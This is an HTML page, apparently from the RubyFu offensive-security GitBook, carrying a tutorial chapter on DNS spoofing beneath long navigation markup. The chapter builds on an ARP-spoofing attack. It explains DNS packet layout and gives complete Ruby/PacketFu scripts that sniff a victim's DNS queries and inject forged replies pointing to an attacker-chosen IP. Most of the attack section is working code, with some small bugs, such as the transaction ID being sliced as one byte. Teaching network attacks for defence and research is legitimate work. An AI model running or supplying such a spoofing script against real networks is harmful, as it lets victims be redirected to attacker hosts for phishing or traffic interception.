+ <li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
875
+
876
+
877
+ <a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
878
+
879
+ <i class="fa fa-check"></i>
880
+
881
+ <b>5.1.</b>
882
+
883
+ Fuzzer
884
+ </a>
885
+
886
+
887
+ </li>
888
+
889
+ <li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
890
+
891
+
892
+ <a href="../module_0x5__exploitation_kung_fu/metasploit.html">
893
+
894
+ <i class="fa fa-check"></i>
895
+
896
+ <b>5.2.</b>
897
+
898
+ Metasploit
899
+ </a>
900
+
901
+
902
+ <ul class="articles">
903
+
904
+
905
+ <li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
906
+
907
+
908
+ <a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
909
+
910
+ <i class="fa fa-check"></i>
911
+
912
+ <b>5.2.1.</b>
913
+
914
+ Auxiliary module
915
+ </a>
916
+
917
+
918
+ </li>
919
+
920
+ <li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
921
+
922
+
923
+ <a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
924
+
925
+ <i class="fa fa-check"></i>
926
+
927
+ <b>5.2.2.</b>
928
+
929
+ Exploit module
930
+ </a>
931
+
932
+
933
+ </li>
934
+
935
+ <li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
936
+
937
+
938
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
939
+
940
+ <i class="fa fa-check"></i>
941
+
942
+ <b>5.2.3.</b>
943
+
944
+ Meterpreter
945
+ </a>
946
+
947
+
948
+ <ul class="articles">
949
+
950
+
951
+ <li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
952
+
953
+
954
+ <a href="../module_0x5__exploitation_kung_fu/extensions.html">
955
+
956
+ <i class="fa fa-check"></i>
957
+
958
+ <b>5.2.3.1.</b>
959
+
960
+ API and Extensions
961
+ </a>
962
+
963
+
964
+ </li>
965
+
966
+ <li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
967
+
968
+
969
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
970
+
971
+ <i class="fa fa-check"></i>
972
+
973
+ <b>5.2.3.2.</b>
974
+
975
+ Meterpreter Scripting
976
+ </a>
977
+
978
+
979
+ </li>
980
+
981
+ <li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
982
+
983
+
984
+ <a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
985
+
986
+ <i class="fa fa-check"></i>
987
+
988
+ <b>5.2.3.3.</b>
989
+
990
+ Railgun API Extension
991
+ </a>
992
+
993
+
994
+ </li>
995
+
996
+
997
+ </ul>
998
+
999
+ </li>
1000
+
1001
+
1002
+ </ul>
1003
+
1004
+ </li>
1005
+
1006
+ <li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
1007
+
1008
+
1009
+ <a href="../module_0x5__exploitation_kung_fu/metasm.html">
1010
+
1011
+ <i class="fa fa-check"></i>
1012
+
1013
+ <b>5.3.</b>
1014
+
1015
+ metasm
1016
+ </a>
1017
+
1018
+
1019
+ </li>
1020
+
1021
+
1022
+ </ul>
1023
+
1024
+ </li>
1025
+
1026
+ <li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
1027
+
1028
+
1029
+ <a href="../module_0x6__forensic/index.html">
1030
+
1031
+ <i class="fa fa-check"></i>
1032
+
1033
+ <b>6.</b>
1034
+
1035
+ Module 0x6 | Forensic Kung Fu
1036
+ </a>
1037
+
1038
+
1039
+ <ul class="articles">
1040
+
1041
+
1042
+ <li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
1043
+
1044
+
1045
+ <a href="../module_0x6__forensic/windows_forensic.html">
1046
+
1047
+ <i class="fa fa-check"></i>
1048
+
1049
+ <b>6.1.</b>
1050
+
1051
+ Windows Forensic
1052
+ </a>
1053
+
1054
+
1055
+ </li>
1056
+
1057
+ <li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
1058
+
1059
+
1060
+ <a href="../module_0x6__forensic/android_forensic.html">
1061
+
1062
+ <i class="fa fa-check"></i>
1063
+
1064
+ <b>6.2.</b>
1065
+
1066
+ Android Forensic
1067
+ </a>
1068
+
1069
+
1070
+ </li>
1071
+
1072
+ <li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
1073
+
1074
+
1075
+ <a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
1076
+
1077
+ <i class="fa fa-check"></i>
1078
+
1079
+ <b>6.3.</b>
1080
+
1081
+ Network Traffic Analysis
1082
+ </a>
1083
+
1084
+
1085
+ </li>
1086
+
1087
+ <li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
1088
+
1089
+
1090
+ <a href="../module_0x6__forensic/parsing_log_files.html">
1091
+
1092
+ <i class="fa fa-check"></i>
1093
+
1094
+ <b>6.4.</b>
1095
+
1096
+ Parsing Log Files
1097
+ </a>
1098
+
1099
+
1100
+ </li>
1101
+
1102
+
1103
+ </ul>
1104
+
1105
+ </li>
1106
+
1107
+ <li class="chapter " data-level="7" data-path="references/index.html">
1108
+
1109
+
1110
+ <a href="../references/index.html">
1111
+
1112
+ <i class="fa fa-check"></i>
1113
+
1114
+ <b>7.</b>
1115
+
1116
+ References
1117
+ </a>
1118
+
1119
+
1120
+ </li>
1121
+
1122
+ <li class="chapter " data-level="8" data-path="faqs/index.html">
1123
+
1124
+
1125
+ <a href="../faqs/index.html">
1126
+
1127
+ <i class="fa fa-check"></i>
1128
+
1129
+ <b>8.</b>
1130
+
1131
+ FAQs
1132
+ </a>
1133
+
1134
+
1135
+ </li>
1136
+
1137
+ <li class="chapter " data-level="9" data-path="contributors/index.html">
1138
+
1139
+
1140
+ <a href="../contributors/index.html">
1141
+
1142
+ <i class="fa fa-check"></i>
1143
+
1144
+ <b>9.</b>
1145
+
1146
+ Contributors
1147
+ </a>
1148
+
1149
+
1150
+ <ul class="articles">
1151
+
1152
+
1153
+ <li class="chapter " data-level="9.1" data-path="contributors/todo.html">
1154
+
1155
+
1156
+ <a href="../contributors/todo.html">
1157
+
1158
+ <i class="fa fa-check"></i>
1159
+
1160
+ <b>9.1.</b>
1161
+
1162
+ TODO
1163
+ </a>
1164
+
1165
+
1166
+ </li>
1167
+
1168
+
1169
+ </ul>
1170
+
1171
+ </li>
1172
+
1173
+
1174
+
1175
+
1176
+ <li class="divider"></li>
1177
+ <li>
1178
+ <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
1179
+ Published with GitBook
1180
+ </a>
1181
+ </li>
1182
+
1183
+ </ul>
1184
+ </nav>
1185
+ </div>
1186
+
1187
+ <div class="book-body">
1188
+ <div class="body-inner">
1189
+ <div class="book-header" role="navigation">
1190
+ <!-- Actions Left -->
1191
+
1192
+
1193
+ <!-- Title -->
1194
+ <h1>
1195
+ <i class="fa fa-circle-o-notch fa-spin"></i>
1196
+ <a href="../" >RubyFu</a>
1197
+ </h1>
1198
+ </div>
1199
+
1200
+ <div class="page-wrapper" tabindex="-1" role="main">
1201
+ <div class="page-inner">
1202
+
1203
+
1204
+ <section class="normal" id="section-">
1205
+
1206
+ <h1 id="dns-spoofing"><a name="dns-spoofing" class="plugin-anchor" href="#dns-spoofing"><span class="fa fa-link"></span></a>DNS Spoofing</h1>
1207
+ <p>Continuing our attack through <a href="module_0x4__network_kung_fu/arp_spoofing.md">ARP Spoofing</a>, we want to change the victim&apos;s DNS request to whatever destination we like.</p>
1208
+ <h3 id="scenario"><a name="scenario" class="plugin-anchor" href="#scenario"><span class="fa fa-link"></span></a>Scenario</h3>
1209
+ <pre><code> |Attacker|
1210
+ | AttackerSite
1211
+ &#x667; AttackerSite
1212
+ |Victim| ----------/ \----------&gt; |Router| ----------&gt; Internet
1213
+ AnySite AttackerSite
1214
+ </code></pre><blockquote>
1215
+ <p>Keep the ARP spoof attack running</p>
1216
+ </blockquote>
1217
+ <p>The same IPs of ARP spoof attack</p>
1218
+ <table>
1219
+ <thead>
1220
+ <tr>
1221
+ <th style="text-align:center">Host</th>
1222
+ <th style="text-align:center">IP Address</th>
1223
+ </tr>
1224
+ </thead>
1225
+ <tbody>
1226
+ <tr>
1227
+ <td style="text-align:center">Attacker</td>
1228
+ <td style="text-align:center">192.168.0.100</td>
1229
+ </tr>
1230
+ <tr>
1231
+ <td style="text-align:center">Victim</td>
1232
+ <td style="text-align:center">192.168.0.21</td>
1233
+ </tr>
1234
+ <tr>
1235
+ <td style="text-align:center">Router</td>
1236
+ <td style="text-align:center">192.168.0.1</td>
1237
+ </tr>
1238
+ </tbody>
1239
+ </table>
1240
+ <p>Now we cant intercept DNS Query packet coming from victim&apos;s machine. Since PacketFu supports filters in capturing (to reduce mount of captured packets) we&apos;ll use <code>udp and port 53 and host</code> filter, then we&apos;ll inspect the captured packet to ensure that it&apos;s a query then find the requested domain. <a href="../files/module03/dns_spoofing_dns-req_res.pcap.pcapng"><strong>Download DNS packet</strong></a>.</p>
1241
+ <p>From Wireshark, if we take a deeper look at the DNS query payload in <code>Domain Name System (query)</code>, we can see its been presented in hexadecimal format.</p>
1242
+ <table>
1243
+ <thead>
1244
+ <tr>
1245
+ <th style="text-align:center"><img src="../images/module03/dns_spoofing_wireshark1.png" alt="Wireshark"></th>
1246
+ </tr>
1247
+ </thead>
1248
+ <tbody>
1249
+ <tr>
1250
+ <td style="text-align:center"><strong>Figure 1.</strong> DNS query Payload</td>
1251
+ </tr>
1252
+ </tbody>
1253
+ </table>
1254
+ <p>Let&apos;s to anatomize our payload</p>
1255
+ <pre><code>0000 e7 1d 01 00 00 01 00 00 00 00 00 00 07 74 77 69
1256
+ 0010 74 74 65 72 03 63 6f 6d 00 00 01 00 01
1257
+ </code></pre><ul>
1258
+ <li>The First 2 bytes is the <strong>Transaction ID</strong> and we don&apos;t care about it for now. (Our case: <code>\xe7\x1d</code>)</li>
1259
+ <li>The next 2 bytes is the <strong>Flags</strong><sup><a href="#fn_3" id="reffn_3">3</a></sup>. (We need: <code>\x01\x00</code> = \x10)</li>
1260
+ <li>Furthermore, in <strong>Queries</strong> section which contains</li>
1261
+ </ul>
1262
+ <pre><code>0000 07 74 77 69 74 74 65 72 03 63 6f 6d 00 00 01 00
1263
+ 0010 01
1264
+ </code></pre><ul>
1265
+ <li><p>The <strong>Queries</strong> starts at <em>13 byte</em> of the payload.</p>
1266
+ <ul>
1267
+ <li><p>The 13th byte specifies the length of the domain name <em>before</em> the <em>very first dot</em> (without last dot com or whatever the top domain is). (Our case: <code>\x07</code>)
1268
+ <strong>Try:</strong><code>[%w{ 74 77 69 74 74 65 72 }.join].pack(&quot;H*&quot;)</code></p>
1269
+ <ul>
1270
+ <li>Notice The domain name of &quot;twitter.com&quot; equals <code>\x07</code> but &quot;www.twitter.com&quot; equals <code>\x03</code> the same consideration for subdomains</li>
1271
+ <li><p>Each dot after first dot will be replaced with the length of the followed characters</p>
1272
+ <p><strong>e.g.</strong> www.google.co.uk</p>
1273
+ <ul>
1274
+ <li>First length (<strong>www</strong>) =&gt; will be replaced with <code>\x03</code></li>
1275
+ <li>First dot(<strong>.google</strong>) =&gt; will be replaced with <code>\x06</code></li>
1276
+ <li>Second dot(<strong>.co</strong>) =&gt; will be replaced with <code>\x02</code></li>
1277
+ <li>Third dot(<strong>.uk</strong>) =&gt; will be replaced with <code>\x02</code></li>
1278
+ </ul>
1279
+ </li>
1280
+ </ul>
1281
+ </li>
1282
+ <li><p>The very end of the domain name string is terminated by a <code>\x00</code>.</p>
1283
+ </li>
1284
+ <li>The next 2 bytes refers to the <strong>type of the query</strong><sup><a href="#fn_4" id="reffn_4">4</a></sup>. (Our case: <code>\x00\x01</code>)</li>
1285
+ </ul>
1286
+ </li>
1287
+ </ul>
1288
+ <p><strong>Now what?!</strong></p>
1289
+ <ul>
1290
+ <li>We need to start capturing/sniffing on specific interface</li>
1291
+ <li>We need to enable promiscuous mode on our interface</li>
1292
+ <li>We need to capture UDP packets on port 53 only</li>
1293
+ <li>We need parse/analyze the valid UDP packets only</li>
1294
+ <li>We need to make sure this packet is a DNS query</li>
1295
+ <li>We need to get the queried/requested domain<ul>
1296
+ <li>We need to know the domain length</li>
1297
+ <li>We need to get the FQDN</li>
1298
+ </ul>
1299
+ </li>
1300
+ <li>Build a DNS response</li>
1301
+ <li>Replace the requested domain with any domain we want</li>
1302
+ <li>Re inject the packet into victim connection and send</li>
1303
+ </ul>
1304
+ <p>I&apos;ll divide our tasks then wrap it up in one script</p>
1305
+ <pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
1306
+ <span class="hljs-comment">#</span>
1307
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;packetfu&apos;</span>
1308
+
1309
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">PacketFu</span>
1310
+
1311
+ <span class="hljs-comment">#</span>
1312
+ <span class="hljs-comment"># * We need to start capturing/sniffing on specific interface</span>
1313
+ <span class="hljs-comment"># * We need to enable promiscuous mode on our interface</span>
1314
+ <span class="hljs-comment"># * We need to capture UDP packets on port 53 only</span>
1315
+ <span class="hljs-comment">#</span>
1316
+ filter = <span class="hljs-string">&quot;udp and port 53 and host &quot;</span> + <span class="hljs-string">&quot;192.168.0.21&quot;</span>
1317
+ capture = <span class="hljs-constant">Capture</span>.new(<span class="hljs-symbol">:iface</span> =&gt; <span class="hljs-string">&quot;wlan0&quot;</span>,<span class="hljs-symbol">:start</span> =&gt; <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:promisc</span> =&gt; <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:filter</span> =&gt; filter, <span class="hljs-symbol">:save</span> =&gt; <span class="hljs-keyword">true</span>)
1318
+
1319
+ <span class="hljs-comment"># * We need to get the queried/requested domain</span>
1320
+ <span class="hljs-comment"># * We need to know the domain length</span>
1321
+ <span class="hljs-comment"># * We need to get the FQDN</span>
1322
+ <span class="hljs-comment">#</span>
1323
+ <span class="hljs-comment"># Convert DNS Payload to readable - Find The FQDN</span>
1324
+ <span class="hljs-comment">#</span>
1325
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">readable</span><span class="hljs-params">(raw_domain)</span></span>
1326
+ <span class="hljs-comment"># Prevent processing non domain</span>
1327
+ <span class="hljs-keyword">if</span> raw_domain[<span class="hljs-number">0</span>].ord == <span class="hljs-number">0</span>
1328
+ puts <span class="hljs-string">&quot;ERROR : THE RAW STARTS WITH 0&quot;</span>
1329
+ <span class="hljs-keyword">return</span> raw_domain[<span class="hljs-number">1</span>..-<span class="hljs-number">1</span>]
1330
+ <span class="hljs-keyword">end</span>
1331
+
1332
+ fqdn = <span class="hljs-string">&quot;&quot;</span>
1333
+ length_offset = raw_domain[<span class="hljs-number">0</span>].ord
1334
+ full_length = raw_domain[ <span class="hljs-number">0</span>..length_offset ].length
1335
+ domain_name = raw_domain[(full_length - length_offset)..length_offset]
1336
+
1337
+ <span class="hljs-keyword">while</span> length_offset != <span class="hljs-number">0</span>
1338
+ fqdn &lt;&lt; domain_name + <span class="hljs-string">&quot;.&quot;</span>
1339
+ length_offset = raw_domain[full_length].ord
1340
+ domain_name = raw_domain[full_length + <span class="hljs-number">1</span>..full_length + length_offset]
1341
+ full_length = raw_domain[<span class="hljs-number">0</span>..full_length + length_offset].length
1342
+ <span class="hljs-keyword">end</span>
1343
+
1344
+ <span class="hljs-keyword">return</span> fqdn.chomp!(<span class="hljs-string">&apos;.&apos;</span>)
1345
+ <span class="hljs-keyword">end</span>
1346
+
1347
+ <span class="hljs-comment"># * We need parse/analyze the valid UDP packets only</span>
1348
+ <span class="hljs-comment"># * We need to make sure this packet is a DNS query</span>
1349
+ <span class="hljs-comment">#</span>
1350
+ <span class="hljs-comment"># Find the DNS packets</span>
1351
+ <span class="hljs-comment">#</span>
1352
+ capture.stream.each <span class="hljs-keyword">do</span> |pkt|
1353
+ <span class="hljs-comment"># Make sure we can parse the packet; if we can, parse it</span>
1354
+ <span class="hljs-keyword">if</span> <span class="hljs-constant">UDPPacket</span>.can_parse?(pkt)
1355
+ <span class="hljs-variable">@packet</span> = <span class="hljs-constant">Packet</span>.parse(pkt)
1356
+
1357
+ <span class="hljs-comment"># Make sure we have a query packet</span>
1358
+ dns_query = <span class="hljs-variable">@packet</span>.payload[<span class="hljs-number">2</span>..<span class="hljs-number">3</span>].to_s
1359
+
1360
+ <span class="hljs-keyword">if</span> dns_query == <span class="hljs-string">&quot;\x01\x00&quot;</span>
1361
+ <span class="hljs-comment"># Get the domain name into a readable format</span>
1362
+ domain_name = <span class="hljs-variable">@packet</span>.payload[<span class="hljs-number">12</span>..-<span class="hljs-number">1</span>].to_s <span class="hljs-comment"># FULL QUERY</span>
1363
+ fqdn = readable(domain_name)
1364
+
1365
+ <span class="hljs-comment"># Ignore non query packet</span>
1366
+ <span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> domain_name.<span class="hljs-keyword">nil</span>?
1367
+
1368
+ puts <span class="hljs-string">&quot;DNS request for: &quot;</span> + fqdn
1369
+ <span class="hljs-keyword">end</span>
1370
+ <span class="hljs-keyword">end</span>
1371
+ <span class="hljs-keyword">end</span>
1372
+ </code></pre>
1373
+ <p>Till now we successfully finished <a href="module_0x3__network_kung_fu/arp_spoofing.md">ARP Spoofing</a> then DNS capturing but still we need to replace/spoof the original response to our domain. e.g. attacker.zone, now we have to build a DNS response instead of spoofed to be sent. So what we need?</p>
1374
+ <ul>
1375
+ <li>taking the IP we are going to redirect the user to (the spoofing_ip)<ul>
1376
+ <li>converting it into hex using the <code>to_i</code> and <code>pack</code> methods.</li>
1377
+ </ul>
1378
+ </li>
1379
+ <li>From there we create a new UDP packet using the data contained in <code>@ourInfo</code> (IP and MAC) and fill in the normal UDP fields.<ul>
1380
+ <li>I take most of this information straight from the DNS Query packet.</li>
1381
+ </ul>
1382
+ </li>
1383
+ <li>The next step is to create the DNS Response.<ul>
1384
+ <li>the best way to understand the code here is to look at a DNS header and then</li>
1385
+ <li>take the bit map of the HEX values and apply them to the header.</li>
1386
+ <li>This will let you see what flags are being set.</li>
1387
+ </ul>
1388
+ </li>
1389
+ <li>From here, we just calculate the checksum for the UDP packet and send it out to the target&apos;s machine.</li>
1390
+ </ul>
1391
+ <table>
1392
+ <thead>
1393
+ <tr>
1394
+ <th style="text-align:center"><img src="dns_spoofing_Wireshark2.png" alt="Wireshark"></th>
1395
+ </tr>
1396
+ </thead>
1397
+ <tbody>
1398
+ <tr>
1399
+ <td style="text-align:center"><strong>Figure 2.</strong> DNS Response Payload</td>
1400
+ </tr>
1401
+ </tbody>
1402
+ </table>
1403
+ <pre><code class="lang-ruby">
1404
+ spoofing_ip = <span class="hljs-string">&quot;69.171.234.21&quot;</span>
1405
+ spoofing_ip.split(<span class="hljs-string">&apos;.&apos;</span>).map {|octet| octet.to_i}.pack(<span class="hljs-string">&apos;c*&apos;</span>)
1406
+
1407
+ response = <span class="hljs-constant">UDPPacket</span>.new(<span class="hljs-symbol">:config</span> =&gt; <span class="hljs-constant">PacketFu::Utils</span>.ifconfig(<span class="hljs-string">&quot;wlan0&quot;</span>))
1408
+ response.udp_src = packet.udp_dst
1409
+ response.udp_dst = packet.udp_src
1410
+ response.ip_saddr = packet.ip_daddr
1411
+ response.ip_daddr = <span class="hljs-string">&quot;192.168.0.21&quot;</span>
1412
+ response.eth_daddr = <span class="hljs-string">&quot;00:0C:29:38:1D:61&quot;</span>
1413
+ </code></pre>
1414
+ <p>Wrapping up </p>
1415
+ <pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
1416
+ <span class="hljs-comment"># -*- coding: binary -*-</span>
1417
+
1418
+ <span class="hljs-comment"># Start the capture process</span>
1419
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;packetfu&apos;</span>
1420
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;pp&apos;</span>
1421
+ <span class="hljs-keyword">include</span> <span class="hljs-constant">PacketFu</span>
1422
+
1423
+
1424
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">readable</span><span class="hljs-params">(raw_domain)</span></span>
1425
+
1426
+ <span class="hljs-comment"># Prevent processing non domain</span>
1427
+ <span class="hljs-keyword">if</span> raw_domain[<span class="hljs-number">0</span>].ord == <span class="hljs-number">0</span>
1428
+ puts <span class="hljs-string">&quot;ERROR : THE RAW STARTS WITH 0&quot;</span>
1429
+ <span class="hljs-keyword">return</span> raw_domain[<span class="hljs-number">1</span>..-<span class="hljs-number">1</span>]
1430
+ <span class="hljs-keyword">end</span>
1431
+
1432
+ fqdn = <span class="hljs-string">&quot;&quot;</span>
1433
+ length_offset = raw_domain[<span class="hljs-number">0</span>].ord
1434
+ full_length = raw_domain[ <span class="hljs-number">0</span>..length_offset ].length
1435
+ domain_name = raw_domain[(full_length - length_offset)..length_offset]
1436
+
1437
+ <span class="hljs-keyword">while</span> length_offset != <span class="hljs-number">0</span>
1438
+ fqdn &lt;&lt; domain_name + <span class="hljs-string">&quot;.&quot;</span>
1439
+ length_offset = raw_domain[full_length].ord
1440
+ domain_name = raw_domain[full_length + <span class="hljs-number">1</span> .. full_length + length_offset]
1441
+ full_length = raw_domain[<span class="hljs-number">0</span> .. full_length + length_offset].length
1442
+ <span class="hljs-keyword">end</span>
1443
+
1444
+ <span class="hljs-keyword">return</span> fqdn.chomp!(<span class="hljs-string">&apos;.&apos;</span>)
1445
+ <span class="hljs-keyword">end</span>
1446
+
1447
+ <span class="hljs-comment">#</span>
1448
+ <span class="hljs-comment"># Send Response</span>
1449
+ <span class="hljs-comment">#</span>
1450
+ <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">spoof_response</span><span class="hljs-params">(packet, domain)</span></span>
1451
+
1452
+ attackerdomain_name = <span class="hljs-string">&apos;rubyfu.net&apos;</span>
1453
+ attackerdomain_ip = <span class="hljs-string">&apos;54.243.253.221&apos;</span>.split(<span class="hljs-string">&apos;.&apos;</span>).map {|oct| oct.to_i}.pack(<span class="hljs-string">&apos;c*&apos;</span>) <span class="hljs-comment"># Spoofing IP</span>
1454
+
1455
+ <span class="hljs-comment"># Build UDP packet</span>
1456
+ response = <span class="hljs-constant">UDPPacket</span>.new(<span class="hljs-symbol">:config</span> =&gt; <span class="hljs-constant">PacketFu::Utils</span>.ifconfig(<span class="hljs-string">&quot;wlan0&quot;</span>))
1457
+ response.udp_src = packet.udp_dst <span class="hljs-comment"># source port</span>
1458
+ response.udp_dst = packet.udp_src <span class="hljs-comment"># destination port</span>
1459
+ response.ip_saddr = packet.ip_daddr <span class="hljs-comment"># modem&apos;s IP address to be source</span>
1460
+ response.ip_daddr = packet.ip_saddr <span class="hljs-comment"># victim&apos;s IP address to be destination</span>
1461
+ response.eth_daddr = packet.eth_saddr <span class="hljs-comment"># the victim&apos;s MAC address</span>
1462
+ response.payload = packet.payload[<span class="hljs-number">0</span>,<span class="hljs-number">1</span>] <span class="hljs-comment"># Transaction ID</span>
1463
+ response.payload += <span class="hljs-string">&quot;\x81\x80&quot;</span> <span class="hljs-comment"># Flags: Reply code: No error (0)</span>
1464
+ response.payload += <span class="hljs-string">&quot;\x00\x01&quot;</span> <span class="hljs-comment"># Question: 1</span>
1465
+ response.payload += <span class="hljs-string">&quot;\x00\x00&quot;</span> <span class="hljs-comment"># Answer RRs: 0</span>
1466
+ response.payload += <span class="hljs-string">&quot;\x00\x00&quot;</span> <span class="hljs-comment"># Authority RRs: 0</span>
1467
+ response.payload += <span class="hljs-string">&quot;\x00\x00&quot;</span> <span class="hljs-comment"># Additional RRs: 0</span>
1468
+ response.payload += attackerdomain_name.split(<span class="hljs-string">&apos;.&apos;</span>).map <span class="hljs-keyword">do</span> |section| <span class="hljs-comment"># Queries | Name: , Convert domain to DNS style(the opposite of readable method)</span>
1469
+ [section.size.chr, section.chars.map {|c| <span class="hljs-string">&apos;\x%x&apos;</span> % c.ord}.join]
1470
+ <span class="hljs-keyword">end</span>.join + <span class="hljs-string">&quot;\x00&quot;</span>
1471
+ response.payload += <span class="hljs-string">&quot;\x00\x01&quot;</span> <span class="hljs-comment"># Queries | Type: A (Host address)</span>
1472
+ response.payload += <span class="hljs-string">&quot;\x00\x01&quot;</span> <span class="hljs-comment"># Queries | Class: IN (0x0001)</span>
1473
+ response.payload += <span class="hljs-string">&quot;\xc0\x0c&quot;</span> <span class="hljs-comment"># Answer | Name: twitter.com</span>
1474
+ response.payload += <span class="hljs-string">&quot;\x00\x01&quot;</span> <span class="hljs-comment"># Answer | Type: A (Host address)</span>
1475
+ response.payload += <span class="hljs-string">&quot;\x00\x01&quot;</span> <span class="hljs-comment"># Answer | Class: IN (0x0001)</span>
1476
+ response.payload += <span class="hljs-string">&quot;\x00\x00\x00\x25&quot;</span> <span class="hljs-comment"># Answer | Time to live: 37 seconds</span>
1477
+ response.payload += <span class="hljs-string">&quot;\x00\x04&quot;</span> <span class="hljs-comment"># Answer | Data length: 4</span>
1478
+ response.payload += attackerdomain_ip <span class="hljs-comment"># Answer | Addr</span>
1479
+ response.recalc <span class="hljs-comment"># Calculate the packet</span>
1480
+ response.to_w(response.iface) <span class="hljs-comment"># Send the packet through our interface</span>
1481
+ <span class="hljs-keyword">end</span>
1482
+
1483
+ filter = <span class="hljs-string">&quot;udp and port 53 and host &quot;</span> + <span class="hljs-string">&quot;192.168.0.21&quot;</span>
1484
+ <span class="hljs-variable">@capture</span> = <span class="hljs-constant">Capture</span>.new(<span class="hljs-symbol">:iface</span> =&gt; <span class="hljs-string">&quot;wlan0&quot;</span>, <span class="hljs-symbol">:start</span> =&gt; <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:promisc</span> =&gt; <span class="hljs-keyword">true</span>, <span class="hljs-symbol">:filter</span> =&gt; filter, <span class="hljs-symbol">:save</span> =&gt; <span class="hljs-keyword">true</span>)
1485
+ <span class="hljs-comment"># Find the DNS packets</span>
1486
+ <span class="hljs-variable">@capture</span>.stream.each <span class="hljs-keyword">do</span> |pkt|
1487
+ <span class="hljs-comment"># Make sure we can parse the packet; if we can, parse it</span>
1488
+ <span class="hljs-keyword">if</span> <span class="hljs-constant">UDPPacket</span>.can_parse?(pkt)
1489
+ packet = <span class="hljs-constant">Packet</span>.parse(pkt)
1490
+
1491
+ <span class="hljs-comment"># Get the offset of the query type: (request=\x01\x00, response=\x81\x80)</span>
1492
+ dns_query = packet.payload[<span class="hljs-number">2</span>..<span class="hljs-number">3</span>].to_s
1493
+
1494
+ <span class="hljs-comment"># Make sure we have a dns query packet</span>
1495
+ <span class="hljs-keyword">if</span> dns_query == <span class="hljs-string">&quot;\x01\x00&quot;</span>
1496
+ <span class="hljs-comment"># Get the domain name into a readable format</span>
1497
+ domain_name = packet.payload[<span class="hljs-number">12</span>..-<span class="hljs-number">1</span>].to_s <span class="hljs-comment"># FULL DOMAIN</span>
1498
+ fqdn = readable(domain_name)
1499
+ <span class="hljs-comment"># Ignore non query packet</span>
1500
+ <span class="hljs-keyword">next</span> <span class="hljs-keyword">if</span> domain_name.<span class="hljs-keyword">nil</span>?
1501
+ puts <span class="hljs-string">&quot;DNS request for: &quot;</span> + fqdn
1502
+
1503
+ <span class="hljs-keyword">end</span>
1504
+ <span class="hljs-comment"># Make sure we have a dns reply packet</span>
1505
+ <span class="hljs-keyword">if</span> dns_query == <span class="hljs-string">&quot;\x81\x80&quot;</span>
1506
+ domain_name = packet.payload[<span class="hljs-number">12</span>..-<span class="hljs-number">1</span>].to_s <span class="hljs-comment"># FULL DOMAIN</span>
1507
+ fqdn = readable(domain_name)
1508
+ puts <span class="hljs-string">&quot;[*] Start Spoofing: &quot;</span> + fqdn
1509
+ spoof_response packet, domain_name
1510
+ <span class="hljs-keyword">end</span>
1511
+
1512
+ <span class="hljs-keyword">end</span>
1513
+ <span class="hljs-keyword">end</span>
1514
+ </code></pre>
1515
+ <p><a href="https://github.com/SilverFoxx/Spoofa/blob/master/spoofa" target="_blank">https://github.com/SilverFoxx/Spoofa/blob/master/spoofa</a></p>
1516
+ <p>Sources<sup><a href="#fn_1" id="reffn_1">1</a></sup> <sup><a href="#fn_2" id="reffn_2">2</a></sup> - The code has been modified and fixed</p>
1517
+ <h2 id=""><a name="" class="plugin-anchor" href="#"><span class="fa fa-link"></span></a><br><br><br></h2>
1518
+ <blockquote id="fn_1">
1519
+ <sup>1</sup>. <a href="http://crushbeercrushcode.org/2012/10/ruby-dns-spoofing-using-packetfu/" target="_blank">DNS Spoofing Using PacketFu</a><a href="#reffn_1" title="Jump back to footnote [1] in the text."> &#x21A9;</a>
1520
+ </blockquote>
1521
+ <blockquote id="fn_2">
1522
+ <sup>2</sup>. <a href="http://tuftsdev.github.io/DefenseOfTheDarkArts/assignments/manipulatingthenetworkwithpacketfu-110314111058-phpapp01.pdf" target="_blank">Manipulating The Network with PacketFu</a><a href="#reffn_2" title="Jump back to footnote [2] in the text."> &#x21A9;</a>
1523
+ </blockquote>
1524
+ <blockquote id="fn_3">
1525
+ <sup>3</sup>. <a href="http://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-12" target="_blank">DNS Header Flags</a><a href="#reffn_3" title="Jump back to footnote [3] in the text."> &#x21A9;</a>
1526
+ </blockquote>
1527
+ <table>
1528
+ <thead>
1529
+ <tr>
1530
